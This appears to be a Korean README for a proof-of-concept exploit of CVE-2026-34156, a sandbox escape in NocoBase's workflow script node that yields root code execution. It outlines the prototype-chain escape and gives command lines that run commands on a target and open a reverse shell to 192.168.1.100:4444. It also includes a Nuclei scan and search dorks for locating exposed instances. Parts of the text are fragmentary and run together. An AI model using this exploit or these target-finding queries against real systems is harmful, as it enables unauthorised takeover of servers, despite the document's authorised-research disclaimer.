
CVE-2026-34156
NocoBase에서 인증되지 않은 사용자 / 낮은 권한 → 루트 원격 코드 실행
CVE-2026-34156은 NocoBase(오픈소스 노코드/로우코드 플랫폼)의 치명적인 샌드박스 탈출 취약점입니다.
워크플로 스크립트 노드(Workflow Script Node) 를 생성하거나 실행할 수 있는 공격자는 낮은 권한만으로도 Node.js vm 샌드박스를 탈출하여 컨테이너 내부에서 루트 권한으로 완전한 원격 코드 실행을 달성할 수 있습니다.
@nocobase/plugin-workflow-javascript (스크립트 노드)console._stdout.constructor.constructor를 통한 샌드박스 탈출uid=0) 권한으로 원격 코드 실행fs)샌드박스로 전달되는 console 개체는 호스트 영역(host realm) 의 것이므로, 공격자는 프로토타입 체인을 타고 올라가 실제 Function 생성자 → process.mainModule.require에 접근할 수 있습니다.
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
리포지토리 포함 항목: 전체 PoC 스크립트, Nuclei 템플릿, 안전 점검 도구.
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm)을 사용하세요.
이 리포지토리는 교육 및 승인된 보안 연구 목적으로만 제공됩니다. 소유한 시스템 또는 명시적인 서면 테스트 허가를 받은 시스템에서만 사용하세요.
승인되지 않은 익스플로잇은 불법입니다.
보안 커뮤니티를 위해 ❤️로 제작됨
안전을 유지하세요. 신속하게 패치하세요.